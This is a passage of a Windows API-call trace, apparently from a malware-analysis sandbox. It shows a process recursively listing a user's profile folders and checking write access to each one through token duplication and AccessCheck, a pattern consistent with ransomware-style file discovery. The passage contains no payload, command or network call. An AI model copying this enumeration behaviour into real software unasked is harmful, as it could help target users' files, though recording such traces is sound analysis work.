returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.339] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.339] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.339] GetLastError () returned 0x7a [0106.339] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG", RequestedInformation=0x7, pSecurityDescriptor=0x28aae88, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28aae88, lpnLengthNeeded=0x281b560) returned 1 [0106.339] GetLastError () returned 0x7a [0106.339] GetCurrentThread () returned 0xfffffffe [0106.339] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.339] GetCurrentProcess () returned 0xffffffff [0106.339] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.339] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.339] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.339] AccessCheck (in: pSecurityDescriptor=0x28aae88, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.339] CloseHandle (hObject=0x32c) returned 1 [0106.339] CloseHandle (hObject=0x344) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.340] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.340] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.340] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\OneDrive\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.341] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\OneDrive", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.341] GetLastError () returned 0x7a [0106.341] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\OneDrive", RequestedInformation=0x7, pSecurityDescriptor=0x28aded0, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28aded0, lpnLengthNeeded=0x281baf8) returned 1 [0106.341] GetLastError () returned 0x7a [0106.341] GetCurrentThread () returned 0xfffffffe [0106.341] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.341] GetCurrentProcess () returned 0xffffffff [0106.341] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.341] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.341] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.341] AccessCheck (in: pSecurityDescriptor=0x28aded0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.341] CloseHandle (hObject=0x344) returned 1 [0106.341] CloseHandle (hObject=0x33c) returned 1 [0106.341] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.342] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.342] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.342] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.342] GetLastError () returned 0x7a [0106.342] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x28aded0, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28aded0, lpnLengthNeeded=0x281baf8) returned 1 [0106.342] GetLastError () returned 0x7a [0106.342] GetCurrentThread () returned 0xfffffffe [0106.342] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.342] GetCurrentProcess () returned 0xffffffff [0106.342] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.342] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.342] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.342] AccessCheck (in: pSecurityDescriptor=0x28aded0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.342] CloseHandle (hObject=0x344) returned 1 [0106.342] CloseHandle (hObject=0x33c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.342] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.342] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.343] GetLastError () returned 0x7a [0106.343] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0", RequestedInformation=0x7, pSecurityDescriptor=0x28aded0, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28aded0, lpnLengthNeeded=0x281b560) returned 1 [0106.343] GetLastError () returned 0x7a [0106.343] GetCurrentThread () returned 0xfffffffe [0106.343] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.343] GetCurrentProcess () returned 0xffffffff [0106.343] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.343] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.343] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.343] AccessCheck (in: pSecurityDescriptor=0x28aded0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.343] CloseHandle (hObject=0x32c) returned 1 [0106.343] CloseHandle (hObject=0x344) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.343] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.343] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.343] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.343] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.344] GetLastError () returned 0x7a [0106.344] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz", RequestedInformation=0x7, pSecurityDescriptor=0x28a8af8, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8af8, lpnLengthNeeded=0x281b560) returned 1 [0106.344] GetLastError () returned 0x7a [0106.344] GetCurrentThread () returned 0xfffffffe [0106.344] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.344] GetCurrentProcess () returned 0xffffffff [0106.344] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.344] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.344] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.344] AccessCheck (in: pSecurityDescriptor=0x28a8af8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.344] CloseHandle (hObject=0x32c) returned 1 [0106.344] CloseHandle (hObject=0x344) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.344] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.344] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.345] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.345] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.345] GetLastError () returned 0x7a [0106.345] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz", RequestedInformation=0x7, pSecurityDescriptor=0x28a8b80, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8b80, lpnLengthNeeded=0x281b560) returned 1 [0106.345] GetLastError () returned 0x7a [0106.345] GetCurrentThread () returned 0xfffffffe [0106.345] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.345] GetCurrentProcess () returned 0xffffffff [0106.345] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.345] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.345] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.345] AccessCheck (in: pSecurityDescriptor=0x28a8b80, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.345] CloseHandle (hObject=0x32c) returned 1 [0106.345] CloseHandle (hObject=0x344) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.345] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.345] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.345] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.346] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Saved Games\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.346] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Saved Games", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.346] GetLastError () returned 0x7a [0106.346] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Saved Games", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.346] GetLastError () returned 0x7a [0106.346] GetCurrentThread () returned 0xfffffffe [0106.346] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.346] GetCurrentProcess () returned 0xffffffff [0106.346] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.346] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.346] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.346] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.346] CloseHandle (hObject=0x344) returned 1 [0106.346] CloseHandle (hObject=0x33c) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.346] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.346] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.346] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Searches\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.346] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Searches", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.347] GetLastError () returned 0x7a [0106.347] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Searches", RequestedInformation=0x7, pSecurityDescriptor=0x28ab0a8, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28ab0a8, lpnLengthNeeded=0x281baf8) returned 1 [0106.347] GetLastError () returned 0x7a [0106.347] GetCurrentThread () returned 0xfffffffe [0106.347] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.347] GetCurrentProcess () returned 0xffffffff [0106.347] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.347] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.347] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.347] AccessCheck (in: pSecurityDescriptor=0x28ab0a8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, 